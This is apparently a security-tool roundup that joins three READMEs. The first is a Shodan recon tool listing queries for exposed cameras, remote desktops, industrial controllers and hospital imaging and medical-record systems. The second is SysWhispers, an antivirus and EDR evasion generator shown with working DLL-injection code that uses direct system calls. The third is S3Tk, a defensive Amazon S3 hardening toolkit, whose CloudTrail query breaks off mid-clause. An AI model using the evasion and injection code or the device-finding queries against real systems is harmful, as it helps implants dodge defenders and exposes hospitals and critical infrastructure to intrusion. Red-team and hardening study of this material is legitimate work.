Full list of supported devices with corresponding queries
"webcam": "device:webcam",
"webcamxp":"webcamxp",
"vivotek":"vivotek",
"techwin":"techwin",
"mobotix":"mobotix",
"iqinvision":"iqinvision",
"grandstream":"Grandstream",
'printer': "device:printer",
'mqtt': 'product:mqtt',
'rtsp': "port:'554'",
'dicom': "dicom",
"ipcamera": "IPCamera_Logo",
"yawcam": "yawcam",
"blueiris": "http.favicon.hash:-520888198",
'ubnt': "UBNT Streaming Server",
"go1984": "go1984",
"dlink": "Server: Camera Web Server",
"avtech": "linux upnp avtech",
"adh": "ADH-web",
"axis":'http.title:"axis" http.html:live',
"rdp":"has_screenshot:true port:3389",
"vnc":"has_screenshot:true port:5901",
"screenshot":"has_screenshot:true !port:3389 !port:3388 !port:5900",

"niagara": "port:1911,4911 product:Niagara",
'bacnet': "port:47808",
'modbus': "port:502",
'siemens': 'Original Siemens Equipment Basic Firmware:',
'dnp3': "port:20000 source address",
"ethernetip": "port:44818",
"gestrip": 'port:18245,18246 product:"general electric"',
'hart': "port:5094 hart-ip",
'pcworx': "port:1962 PLC",
"mitsubishi": "port:5006,5007 product:mitsubishi",
"omron": "port:9600 response code",
"redlion": 'port:789 product:"Red Lion Controls"',
'codesys': "port:2455 operating system",
"iec": "port:2404 asdu address",
'proconos': "port:20547 PLC",

"plantvisor": "Server: CarelDataServer",
"iologik": "iologik",
"moxa": "Moxa",
"akcp": "Server: AKCP Embedded Web Server",
"spidercontrol": "powered by SpiderControl TM",
"tank": "port:10001 tank",
"iq3": "Server: IQ3",
"is2": "IS2 Web Server",
"vtscada": "Server: VTScada",
'zworld': "Z-World Rabbit",
"nordex": "Jetty 3.1.8 (Windows 2000 5.0 x86)",

"axc":"PLC Type: AXC",
"modicon":"modicon",
"xp277":"HMI, XP277",
"vxworks":"vxworks",
"eig":"EIG Embedded Web Server",
"digi":"TransPort WR21",
"windweb":"server: WindWeb",
"moxahttp":"MoxaHttp",
"lantronix":"lantronix",
"entelitouch":"Server: DELTA enteliTOUCH",
"energyict_rtu":"EnergyICT RTU",
"crestron":"crestron",
"wince":'Server: "Microsoft-WinCE"',
"ipc@chip":"IPC@CHIP",
"addup":"addUPI",
"anybus":'"anybus-s"',
"windriver":"WindRiver-WebServer",
"wago":"wago",
"niagara_audit":"niagara_audit",
"niagara_web_server":"Niagara Web Server",
"trendnet":"trendnet",
"stulz_klimatechnik":"Stulz GmbH Klimatechnik",
"somfy":"title:Somfy",
"scalance":"scalance",
"simatic":"simatic",
"simatic_s7":"Portal0000",
"schneider_electric":"Schneider Electric",
"power_measurement":"Power Measurement Ltd",
"power_logic":"title:PowerLogic",
"telemecanique_bxm":"TELEMECANIQUE BMX",
"schneider_web":"Schneider-WEB",
"fujitsu_serverview":"serverview",
"eiportal":"eiPortal",
"ilon":"i.LON",
"Webvisu":"Webvisu",
"total_access": 'ta g en3 port:2000'

Medical
"zoll":"http.favicon.hash:-236942626",
"perioperative":"HoF Perioperative",
"wall_of_analytics":"title:'Wall of Analytics'",
"viztek_exa":"X-Super-Powered-By: VIZTEK EXA",
"desert_view_bkup":"title:'DESERT VIEW BKUP'",
"intuitim":"http.favicon.hash:159662640",
"Medcon Archiving System":"http.favicon.hash:-897903496",
"orthanc_explorer":"title:'Orthanc Explorer'",
"Marco Pacs":"title:'Marco pacs'",
"osirix":"title:OsiriX",
"clari_pacs":"title:ClariPACS",
"siste_lab":"http.html:SisteLAB",
"opalweb":"html:opalweb",
"neuropro":"title:'EEG Laboratory'",
"tmw_document_imaging":"title:'TMW Document Imaging'",
"erez":"title:'eRez Imaging'",
"gluco_care":"html:'GlucoCare igc'",
"glucose_guide":"title:'glucose guide'",
"grandmed_glucose":"title:'Grandmed Glucose'",
"philips_digital_pathology":"title:'Philips Digital Pathology'",
"tricore_pathology":"title:'TriCore Pathology'",
"appsmart_ophthalmology":"title:'Appsmart Ophthalmology'",
"chs_ophthalmology":"title:'CHS Ophthalmology'",
"ram_soft":"html:powerreader",
"xnat":"http.favicon.hash:-230640598",
"iris_emr":"title:'Iris EMR'",
"eclinicalworks_emr":"title:'Web EMR Login Page'",
"open_emr":"http.favicon.hash:1971268439",
"oscar_emr":"title:'OSCAR EMR'",
"wm_emr":"http.favicon.hash:1617804812",
"doctors_partner_emr":"title:'DoctorsPartner'",
"mckesson_radiology":"title:'McKesson Radiology'",
"kodak_carestream":"title:'Carestream PACS'",
"meded":"title:meded",
"centricity_radiology":"http.favicon.hash:-458315012",
"openeyes":"http.favicon.hash:-885931907",
"orthanc":"orthanc",
"horos":"http.favicon.hash:398467600",
"open_mrs":"title:openmrs",
"mirth_connect":"http.favicon.hash:1502215759",
"acuity_logic":"title:AcuityLogic",
"optical_coherence_tomography":"title:'OCT Webview'",
"philips_intellispace":"title:INTELLISPACE",
"vitrea_intelligence":"title:'Vitrea intelligence'",
"phenom_electron_microscope":"title:'Phenom-World'",
"meddream_dicom_viewer":"html:Softneta",
"merge_pacs":"http.favicon.hash:-74870968",
"synapse_3d":"http.favicon.hash:394706326",
"navify":"title:navify",
"telemis_tmp":"http.favicon.hash:220883165",
"brainlab":"title:'Brainlab Origin Server'",
"nexus360":"http.favicon.hash:125825464",
"brain_scope":"title:BrainScope",
"omero_microscopy":"http.favicon.hash:2140687598",
"meditech":"Meditech",
"cynetics":"cynetics",
"promed":"Promed",
"carestream":"Carestream",
"carestream_web":"title:Carestream",
"vet_rocket":"http.html:'Vet Rocket'",
"planmeca":"Planmeca",
"vet_view":"http.favicon.hash:1758472204",
"lumed":"http.html:'LUMED'",
"infinitt":"http.favicon.hash:-255936262",
"labtech":"labtech",
"progetti":"http.html:'Progetti S.r.l.'",
"qt_medical":"http.html:'QT Medical'",
"aspel": "ASPEL",
"huvitz_optometric":"http.html:'Huvitz'",
"optovue":"Optovue",
"optos_advance":"http.title:'OptosAdvance'",
"asthma_monitoring_adamm":"http.title:'HCO Telemedicine'",
"pregnabit":"http.html:'Pregnabit'",
"prime_clinical_systems":"http.html:'Prime Clinical Systems'",
"omni_explorer":"http.title:OmniExplorer",
"avizia":"http.html:'Avizia'",
"operamed":"Operamed",
"early_sense":"http.favicon.hash:-639764351",
"tunstall":"http.html:'Tunstall'",
"clini_net":"http.html:'CliniNet®'",
"intelesens":"title:'zensoronline)) - online monitoring'",
"kb_port":"http.html:'KbPort'",
"nursecall_message_service":"http.title:'N.M.S. - Nursecall Message Service'",
"image_information_systems":"http.html:'IMAGE Information Systems'",
"agilent_technologies":"Agilent Technologies port:5025",
"praxis_portal2":"http.html:'Medigration'",
"xero_viewer":"http.title:'XERO Viewer'"

Excluded:
title:"pacemaker-id"
html:klinikinew
title:"EEG Viewer"
http.favicon.hash:-1989988507
plexus platenet
http.favicon.hash:-189701579
title:"Insulin Dosage"
pathology image seve
http.favicon.hash:538032019
title:"MsFLASH"
title:"THIP EMR"
title:"CARDIOHF"
title:"CN EMR Office"
Power2Practice
http.favicon.hash:-1982401487
Cosmed EMR
http.favicon.hash:-1747178511
title:" Premier Radiology synapse"
title:"PRIME - Electrical Resistivity Tomography"
title:"OCT II System"
http.favicon.hash:-582594220
title:"Atomic Force Microscope"
title:axeda
http.favicon.hash:-1351683412
title:"InTouch Health Log Manager"
title:"Pharma Vtiger"
title:sema4
NAVIFY
Nextech
http.html:'Radiometer Medical '
HeartStart
http.favicon.hash:-893361748

Used components

Known bugs:
  • It's version 1.0, so please raise an issue if you think you found a bug or have an idea to make it better.
  • Sometimes the search page keeps the last values, so please use ctrl+shift+R to refresh the main search page.
  • Debug info is left on purpose for raising issues.
  • Still some problems with getting CVEs from Shodan search results.
  • Flickr infowindow size.

Contribution
I really care about feedback from you. If you have any idea how to make the tool better, I'm more than happy to hear it. It's also possible to upload and host the tool online; if you want to help, dm me.

TODO
  • Live monitoring
  • Offensive capabilities
  • More devices
  • More sources (Instagram?, Youtube?)
  • Integration with Nmap and plcscan
  • Extensive error checking/debugging
  • Cleanup code, delete legacy/unused dependencies js, css files
  • Keeping keys in db
  • Your ideas

Remarks
  • Tested only on Kali Linux 2019.3
  • It uses the default sqlite Django database
  • Buttons in the Intel tab for a device do not show progress bars; you get results within a couple of seconds at most.
  • Own database button does not work; it shows that it's possible to load your own geolocation database. I haven't found a better one than Shodan's, but let me know if you have access to one.
  • Looking for nearby Tweets works, but I wasn't able to find any tweets. It may be a problem with the Twitter API. Let me know if you can find anything.
  • Don't blame me for unintentional bugs that might exhaust your Shodan/BinaryEdge/WHOISXMLAPI credits.
  • I'm not responsible for any damage caused by using this tool.


SysWhispers - AV/EDR Evasion Via Direct System Calls


SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls.
All core syscalls are supported from Windows XP to 10. Example generated files available in example-output/.

Introduction
Various security products place hooks in user-mode APIs which allow them to redirect execution flow to their engines and detect suspicious behaviour. The functions in ntdll.dll that make the syscalls consist of just a few assembly instructions, so re-implementing them in your own implant can bypass the triggering of those security product hooks. This technique was popularized by @Cn33liz, and his blog post has more technical details worth reading.
SysWhispers provides red teamers the ability to generate header/ASM pairs for any system call in the core kernel image (ntoskrnl.exe) across any Windows version starting from XP. The headers will also include the necessary type definitions.
The main implementation difference between this and the Dumpert POC is that this doesn't call RtlGetVersion to query the OS version, but instead does this in the assembly by querying the PEB directly. The benefit is being able to call one function that supports multiple Windows versions instead of calling multiple functions each supporting one version.

Installation
> git clone https://github.com/jthuraisamy/SysWhispers.git
> cd SysWhispers
> pip3 install -r .\requirements.txt
> py .\syswhispers.py --help

Usage and Examples

Command Lines
# Export all functions with compatibility for all supported Windows versions (see example-output/).
py .\syswhispers.py --preset all -o syscalls_all

# Export just the common functions with compatibility for Windows 7, 8, and 10.
py .\syswhispers.py --preset common -o syscalls_common

# Export NtProtectVirtualMemory and NtWriteVirtualMemory with compatibility for all versions.
py .\syswhispers.py --functions NtProtectVirtualMemory,NtWriteVirtualMemory -o syscalls_mem

# Export all functions with compatibility for Windows 7, 8, and 10.
py .\syswhispers.py --versions 7,8,10 -o syscalls_78X

Script Output
PS C:\Projects\SysWhispers> py .\syswhispers.py --preset common --out-file syscom

, , ,_ /_ . , ,_ _ ,_ ,
_/_)__(_/__/_)__/_/_/ / (__/__/_)__/_)__(/__/ (__/_)__
_/_ /
(/ / @Jackson_T, 2019

SysWhispers: Why call the kernel when you can whisper?

Common functions selected.

Complete! Files written to:
syscom.asm
syscom.h

Before-and-After Example of Classic CreateRemoteThread DLL Injection
py .\syswhispers.py -f NtAllocateVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx -o syscalls
Before (Win32 API wrappers):
#include <Windows.h>

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, strlen(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    WriteProcessMemory(hProcess, lpBaseAddress, dllPath, strlen(dllPath), nullptr);
    CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);
}
After (direct system calls from the generated header):
#include <Windows.h>
#include "syscalls.h" // Import the generated header.

void InjectDll(const HANDLE hProcess, const char* dllPath)
{
    HANDLE hThread = NULL;
    LPVOID lpAllocationStart = nullptr;
    SIZE_T szAllocationSize = strlen(dllPath);
    LPVOID lpStartAddress = GetProcAddress(GetModuleHandle(L"kernel32.dll"), "LoadLibraryA");

    NtAllocateVirtualMemory(hProcess, &lpAllocationStart, 0, (PULONG)&szAllocationSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    NtWriteVirtualMemory(hProcess, lpAllocationStart, (PVOID)dllPath, strlen(dllPath), nullptr);
    NtCreateThreadEx(&hThread, GENERIC_EXECUTE, NULL, hProcess, lpStartAddress, lpAllocationStart, FALSE, 0, 0, 0, nullptr);
}

Common Functions
Using the --preset common switch will create a header/ASM pair with the following functions:



  • NtCreateProcess (CreateProcess)
  • NtCreateThreadEx (CreateRemoteThread)
  • NtOpenProcess (OpenProcess)
  • NtOpenThread (OpenThread)
  • NtSuspendProcess
  • NtSuspendThread (SuspendThread)
  • NtResumeProcess
  • NtResumeThread (ResumeThread)
  • NtGetContextThread (GetThreadContext)
  • NtSetContextThread (SetThreadContext)
  • NtClose (CloseHandle)
  • NtReadVirtualMemory (ReadProcessMemory)
  • NtWriteVirtualMemory (WriteProcessMemory)
  • NtAllocateVirtualMemory (VirtualAllocEx)
  • NtProtectVirtualMemory (VirtualProtectEx)
  • NtFreeVirtualMemory (VirtualFreeEx)
  • NtQuerySystemInformation (GetSystemInfo)
  • NtQueryDirectoryFile
  • NtQueryInformationFile
  • NtQueryInformationProcess
  • NtQueryInformationThread
  • NtCreateSection (CreateFileMapping)
  • NtOpenSection
  • NtMapViewOfSection
  • NtUnmapViewOfSection
  • NtAdjustPrivilegesToken (AdjustTokenPrivileges)
  • NtDeviceIoControlFile (DeviceIoControl)
  • NtQueueApcThread (QueueUserAPC)
  • NtWaitForMultipleObjects (WaitForMultipleObjectsEx)

Importing into Visual Studio
  1. Copy the generated H/ASM files into the project folder.
  2. In Visual Studio, go to Project > Build Customizations... and enable MASM.
  3. In the Solution Explorer, add the .h and .asm files to the project as header and source files, respectively.
  4. Go to the properties of the ASM file, and set the Item Type to Microsoft Macro Assembler.
  5. Ensure that the project platform is set to x64. 32-bit projects are not supported at this time.

Caveats and Limitations
  • Only 64-bit Windows is supported at this time.
  • System calls from the graphical subsystem (win32k.sys) are not supported.
  • Tested on Visual Studio 2019 (v142) with Windows 10 SDK.

Troubleshooting
  • ModuleNotFoundError in Python script.
    • Ensure that the required modules are installed with pip3 install -r requirements.txt.
  • Type redefinition errors: a project may not compile if typedefs in syscalls.h have already been defined.
    • Ensure that only required functions are included (i.e. --preset all is rarely necessary).
    • If a typedef is already defined in another used header, then it could be removed from syscalls.h.

Credits
This script was developed by @Jackson_T but builds upon the work of many others:
Special thanks to @Dcept905 for testing and suggestions.

Related Articles and Projects


S3Tk - A Security Toolkit For Amazon S3


A security toolkit for Amazon S3
Another day, another leaky Amazon S3 bucket
— The Register, 12 Jul 2017
Don’t be the... next... big... data... leak

Battle-tested at Instacart

Installation
Run:
pip install s3tk
You can use the AWS CLI to set up your AWS credentials:
pip install awscli
aws configure
See IAM policies needed for each command.

Commands

Scan
Scan your buckets for:
  • ACL open to public
  • policy open to public
  • logging enabled
  • versioning enabled
  • default encryption enabled
s3tk scan
Only run on specific buckets
s3tk scan my-bucket my-bucket-2
Also works with wildcards
s3tk scan "my-bucket*"
Confirm correct log bucket(s) and prefix
s3tk scan --log-bucket my-s3-logs --log-bucket other-region-logs --log-prefix "{bucket}/"
Skip logging, versioning, or default encryption
s3tk scan --skip-logging --skip-versioning --skip-default-encryption
Get email notifications of failures (via SNS)
s3tk scan --sns-topic arn:aws:sns:...
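The five checks that scan performs can be reproduced offline against the data structures the S3 API returns. The following is an added example, not s3tk's own code: it evaluates GetBucketAcl grants, a bucket policy document and the logging, versioning and encryption configurations the way the scan above describes, treating an unconditional Allow to an anonymous principal as "policy open to public" (the Deny-only "only private uploads" policy from the Bucket Policies section is correctly not flagged). The bucket configurations and owner IDs are constructed placeholders.

```python
"""Offline check of an S3 bucket's public-exposure posture (added example, not s3tk code)."""
import json

# Canonical grantee groups that make an ACL world- or any-AWS-user-readable.
PUBLIC_GRANTEE_URIS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def acl_is_public(acl):
    """True if any grant goes to the AllUsers or AuthenticatedUsers group."""
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GRANTEE_URIS:
            return True
    return False


def _principal_is_everyone(principal):
    # Principal may be the string "*" or {"AWS": "*"} / {"AWS": ["*", ...]}.
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        aws = [aws] if isinstance(aws, str) else aws
        return "*" in aws
    return False


def policy_is_public(policy):
    """True if an unconditional Allow statement grants anonymous principals access.

    Deny statements and statements scoped by a Condition block are not counted.
    Accepts the policy as a dict or as the JSON string GetBucketPolicy returns.
    """
    if policy is None:
        return False
    if isinstance(policy, str):
        policy = json.loads(policy)
    statements = policy.get("Statement", [])
    statements = [statements] if isinstance(statements, dict) else statements
    for stmt in statements:
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue
        if _principal_is_everyone(stmt.get("Principal")):
            return True
    return False


def scan_bucket(cfg):
    """Return the five findings as booleans; cfg holds the Get* API responses."""
    return {
        "acl_public": acl_is_public(cfg.get("acl", {})),
        "policy_public": policy_is_public(cfg.get("policy")),
        "logging_enabled": "LoggingEnabled" in (cfg.get("logging") or {}),
        "versioning_enabled": (cfg.get("versioning") or {}).get("Status") == "Enabled",
        "default_encryption_enabled": bool(
            (cfg.get("encryption") or {}).get("ServerSideEncryptionConfiguration", {}).get("Rules")
        ),
    }


# Constructed samples: a leaky bucket and a hardened one (IDs are placeholders).
LEAKY_BUCKET = {
    "acl": {"Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"}, "Permission": "FULL_CONTROL"},
        {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"},
    ]},
    "policy": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:GetObject", "Resource": "arn:aws:s3:::my-bucket/*"},
    ]},
    "logging": {},
    "versioning": {},
    "encryption": {},
}

HARDENED_BUCKET = {
    "acl": {"Grants": [
        {"Grantee": {"Type": "CanonicalUser", "ID": "OWNER-ID-PLACEHOLDER"}, "Permission": "FULL_CONTROL"},
    ]},
    # The README's "only private uploads" Deny policy: not public access.
    "policy": {"Version": "2012-10-17", "Statement": [
        {"Effect": "Deny", "Principal": "*", "Action": "s3:PutObjectAcl", "Resource": "arn:aws:s3:::my-bucket/*"},
    ]},
    "logging": {"LoggingEnabled": {"TargetBucket": "my-s3-logs", "TargetPrefix": "my-bucket/"}},
    "versioning": {"Status": "Enabled"},
    "encryption": {"ServerSideEncryptionConfiguration": {"Rules": [
        {"ApplyServerSideEncryptionByDefault": {"SSEAlgorithm": "AES256"}},
    ]}},
}

if __name__ == "__main__":
    for name, cfg in ("leaky", LEAKY_BUCKET), ("hardened", HARDENED_BUCKET):
        print(name, scan_bucket(cfg))
```

To run this against real buckets, feed scan_bucket the dicts returned by boto3's get_bucket_acl, get_bucket_policy (the "Policy" string), get_bucket_logging, get_bucket_versioning and get_bucket_encryption, remembering that the last call raises when no default encryption is configured.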

List Policy
List bucket policies
s3tk list-policy
Only run on specific buckets
s3tk list-policy my-bucket my-bucket-2
Show named statements
s3tk list-policy --named

Set Policy
Note: This replaces the previous policy
Only private uploads
s3tk set-policy my-bucket --no-object-acl

Delete Policy
Delete policy
s3tk delete-policy my-bucket

Enable Logging
Enable logging on all buckets
s3tk enable-logging --log-bucket my-s3-logs
Only on specific buckets
s3tk enable-logging my-bucket my-bucket-2 --log-bucket my-s3-logs
Set log prefix ({bucket}/ by default)
s3tk enable-logging --log-bucket my-s3-logs --log-prefix "logs/{bucket}/"
Use the --dry-run flag to test
A few notes about logging:
  • buckets with logging already enabled are not updated at all
  • the log bucket must be in the same region as the source bucket - run this command multiple times for different regions
  • it can take over an hour for logs to show up

Enable Versioning
Enable versioning on all buckets
s3tk enable-versioning
Only on specific buckets
s3tk enable-versioning my-bucket my-bucket-2
Use the --dry-run flag to test

Enable Default Encryption
Enable default encryption on all buckets
s3tk enable-default-encryption
Only on specific buckets
s3tk enable-default-encryption my-bucket my-bucket-2
This does not encrypt existing objects - use the encrypt command for this
Use the --dry-run flag to test

Scan Object ACL
Scan ACL on all objects in a bucket
s3tk scan-object-acl my-bucket
Only certain objects
s3tk scan-object-acl my-bucket --only "*.pdf"
Except certain objects
s3tk scan-object-acl my-bucket --except "*.jpg"

Reset Object ACL
Reset ACL on all objects in a bucket
s3tk reset-object-acl my-bucket
This makes all objects private. See bucket policies for how to enforce going forward.
Use the --dry-run flag to test
Specify certain objects the same way as scan-object-acl

Encrypt
Encrypt all objects in a bucket with server-side encryption
s3tk encrypt my-bucket
Uses S3-managed keys by default. For KMS-managed keys, use:
s3tk encrypt my-bucket --kms-key-id arn:aws:kms:...
For customer-provided keys, use:
s3tk encrypt my-bucket --customer-key secret-key
Use the --dry-run flag to test
Specify certain objects the same way as scan-object-acl
Note: Objects will lose any custom ACL

Delete Unencrypted Versions
Delete all unencrypted versions of objects in a bucket
s3tk delete-unencrypted-versions my-bucket
For safety, this will not delete any current versions of objects
Use the --dry-run flag to test
Specify certain objects the same way as scan-object-acl

Scan DNS
Scan Route 53 for buckets to make sure you own them
s3tk scan-dns
Otherwise, you may be susceptible to subdomain takeover

Credentials
Credentials can be specified in ~/.aws/credentials or with environment variables. See this guide for an explanation of environment variables.
You can specify a profile to use with:
AWS_PROFILE=your-profile s3tk

IAM Policies
Here are the permissions needed for each command. Only include statements you need.
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "Scan",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:GetBucketAcl",
        "s3:GetBucketPolicy",
        "s3:GetBucketLogging",
        "s3:GetBucketVersioning",
        "s3:GetEncryptionConfiguration"
      ],
      "Resource": "*"
    },
    {
      "Sid": "ScanDNS",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "route53:ListHostedZones",
        "route53:ListResourceRecordSets"
      ],
      "Resource": "*"
    },
    {
      "Sid": "ListPolicy",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:GetBucketPolicy"
      ],
      "Resource": "*"
    },
    {
      "Sid": "SetPolicy",
      "Effect": "Allow",
      "Action": [
        "s3:PutBucketPolicy"
      ],
      "Resource": "*"
    },
    {
      "Sid": "DeletePolicy",
      "Effect": "Allow",
      "Action": [
        "s3:DeleteBucketPolicy"
      ],
      "Resource": "*"
    },
    {
      "Sid": "EnableLogging",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:PutBucketLogging"
      ],
      "Resource": "*"
    },
    {
      "Sid": "EnableVersioning",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:PutBucketVersioning"
      ],
      "Resource": "*"
    },
    {
      "Sid": "EnableDefaultEncryption",
      "Effect": "Allow",
      "Action": [
        "s3:ListAllMyBuckets",
        "s3:PutEncryptionConfiguration"
      ],
      "Resource": "*"
    },
    {
      "Sid": "ResetObjectAcl",
      "Effect": "Allow",
      "Action": [
        "s3:ListBucket",
        "s3:GetObjectAcl",
        "s3:PutObjectAcl"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    },
    {
      "Sid": "Encrypt",
      "Effect": "Allow",
      "Action": [
        "s3:ListBucket",
        "s3:GetObject",
        "s3:PutObject"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    },
    {
      "Sid": "DeleteUnencryptedVersions",
      "Effect": "Allow",
      "Action": [
        "s3:ListBucketVersions",
        "s3:GetObjectVersion",
        "s3:DeleteObjectVersion"
      ],
      "Resource": [
        "arn:aws:s3:::my-bucket",
        "arn:aws:s3:::my-bucket/*"
      ]
    }
  ]
}

Access Logs
Amazon Athena is great for querying S3 logs. Create a table (thanks to this post for the table structure) with:
CREATE EXTERNAL TABLE my_bucket (
  bucket_owner string,
  bucket string,
  time string,
  remote_ip string,
  requester string,
  request_id string,
  operation string,
  key string,
  request_verb string,
  request_url string,
  request_proto string,
  status_code string,
  error_code string,
  bytes_sent string,
  object_size string,
  total_time string,
  turn_around_time string,
  referrer string,
  user_agent string,
  version_id string
)
ROW FORMAT SERDE 'org.apache.hadoop.hive.serde2.RegexSerDe'
WITH SERDEPROPERTIES (
  'serialization.format' = '1',
  'input.regex' = '([^ ]*) ([^ ]*) \\[(.*?)\\] ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) \\\"([^ ]*) ([^ ]*) (- |[^ ]*)\\\" (-|[0-9]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) ([^ ]*) (\"[^\"]*\\") ([^ ]*)$'
) LOCATION 's3://my-s3-logs/my-bucket/';
Change the last line to point to your log bucket (and prefix) and query away
SELECT
  date_parse(time, '%d/%b/%Y:%H:%i:%S +0000') AS time,
  request_url,
  remote_ip,
  user_agent
FROM
  my_bucket
WHERE
  requester = '-'
  AND status_code LIKE '2%'
  AND request_url LIKE '/some-keys%'
ORDER BY 1
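The same anonymous-successful-read query can be run over raw access log lines without Athena, which is handy for a quick triage of a downloaded log prefix. The following is an added example, not part of s3tk: the regular expression is a Python transliteration of the 20 columns the Athena table above defines (one named group per column), and the function applies the same three predicates as the query (requester '-', 2xx status, URL prefix) and sorts by the parsed timestamp. The three log lines are constructed samples with placeholder IDs and RFC 5737 addresses, not real logs.

```python
"""Offline filter for S3 server access logs (added example, not s3tk code)."""
import re
from datetime import datetime

# One named group per column of the Athena table, in the same order.
ACCESS_LOG_RE = re.compile(
    r'(?P<bucket_owner>\S+) (?P<bucket>\S+) \[(?P<time>[^\]]+)\] (?P<remote_ip>\S+) '
    r'(?P<requester>\S+) (?P<request_id>\S+) (?P<operation>\S+) (?P<key>\S+) '
    r'"(?P<request_verb>\S+) (?P<request_url>\S+) (?P<request_proto>[^"]*)" '
    r'(?P<status_code>\S+) (?P<error_code>\S+) (?P<bytes_sent>\S+) (?P<object_size>\S+) '
    r'(?P<total_time>\S+) (?P<turn_around_time>\S+) "(?P<referrer>[^"]*)" '
    r'"(?P<user_agent>[^"]*)" (?P<version_id>\S+)'
)


def parse_access_log_line(line):
    """Return the line's fields as a dict, or None if it does not match the format."""
    m = ACCESS_LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def anonymous_successful_reads(lines, url_prefix):
    """Rows the Athena query above would return: unauthenticated requests
    (requester '-') that succeeded (2xx) under url_prefix, ordered by time."""
    rows = []
    for line in lines:
        rec = parse_access_log_line(line)
        if rec is None:
            continue  # skip malformed lines instead of aborting the whole report
        if rec["requester"] != "-":
            continue
        if not rec["status_code"].startswith("2"):
            continue
        if not rec["request_url"].startswith(url_prefix):
            continue
        # Same format the query's date_parse handles: 06/Feb/2019:00:01:02 +0000
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        rows.append(rec)
    rows.sort(key=lambda r: r["time"])
    return rows


# Constructed sample log lines (placeholder IDs, documentation-range IPs).
SAMPLE_LOG = [
    # authenticated GET: requester is an account ID, so it is not reported
    'OWNER-ID-PLACEHOLDER my-bucket [06/Feb/2019:00:00:38 +0000] 192.0.2.10 REQUESTER-ID-PLACEHOLDER '
    'REQID1 REST.GET.OBJECT some-keys/a.pdf "GET /some-keys/a.pdf HTTP/1.1" 200 - 1024 1024 12 9 "-" "aws-cli/1.16" -',
    # anonymous GET that succeeded under /some-keys: the exposure the query looks for
    'OWNER-ID-PLACEHOLDER my-bucket [06/Feb/2019:00:01:02 +0000] 198.51.100.7 - '
    'REQID2 REST.GET.OBJECT some-keys/b.pdf "GET /some-keys/b.pdf HTTP/1.1" 200 - 2048 2048 15 11 "-" "Mozilla/5.0" -',
    # anonymous GET that was denied: 403, so it is not reported
    'OWNER-ID-PLACEHOLDER my-bucket [06/Feb/2019:00:00:50 +0000] 198.51.100.7 - '
    'REQID3 REST.GET.OBJECT some-keys/c.pdf "GET /some-keys/c.pdf HTTP/1.1" 403 AccessDenied 243 - 4 - "-" "curl/7.64" -',
]

if __name__ == "__main__":
    for row in anonymous_successful_reads(SAMPLE_LOG, "/some-keys"):
        print(row["time"].isoformat(), row["request_url"], row["remote_ip"], row["user_agent"])
```

Because the pattern is applied with match() rather than fullmatch(), the extra trailing fields that newer S3 log lines carry (host id, signature version, TLS details) are ignored rather than causing the line to be dropped.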

CloudTrail Logs
Amazon Athena is also great for querying CloudTrail logs. Create a table (thanks to this post for the table structure) with:
CREATE EXTERNAL TABLE cloudtrail_logs (
  eventversion STRING,
  userIdentity STRUCT<
    type:STRING,
    principalid:STRING,
    arn:STRING,
    accountid:STRING,
    invokedby:STRING,
    accesskeyid:STRING,
    userName:String,
    sessioncontext:STRUCT<
      attributes:STRUCT<
        mfaauthenticated:STRING,
        creationdate:STRING>,
      sessionIssuer:STRUCT<
        type:STRING,
        principalId:STRING,
        arn:STRING,
        accountId:STRING,
        userName:STRING>>>,
  eventTime STRING,
  eventSource STRING,
  eventName STRING,
  awsRegion STRING,
  sourceIpAddress STRING,
  userAgent STRING,
  errorCode STRING,
  errorMessage STRING,
  requestId STRING,
  eventId STRING,
  resources ARRAY<STRUCT<
    ARN:STRING,
    accountId:STRING,
    type:STRING>>,
  eventType STRING,
  apiVersion STRING,
  readOnly BOOLEAN,
  recipientAccountId STRING,
  sharedEventID STRING,
  vpcEndpointId STRING,
  requestParameters STRING,
  responseElements STRING,
  additionalEventData STRING,
  serviceEventDetails STRING
)
ROW FORMAT SERDE 'com.amazon.emr.hive.serde.CloudTrailSerde'
STORED AS INPUTFORMAT 'com.amazon.emr.cloudtrail.CloudTrailInputFormat'
OUTPUTFORMAT 'org.apache.hadoop.hive.ql.io.HiveIgnoreKeyTextOutputFormat'
LOCATION 's3://my-cloudtrail-logs/'
Change the last line to point to your CloudTrail log bucket and query away
SELECT
  eventTime,
  eventName,
  userIdentity.userName,
  requestParameters
FROM
  cloudtrail_logs
WHERE
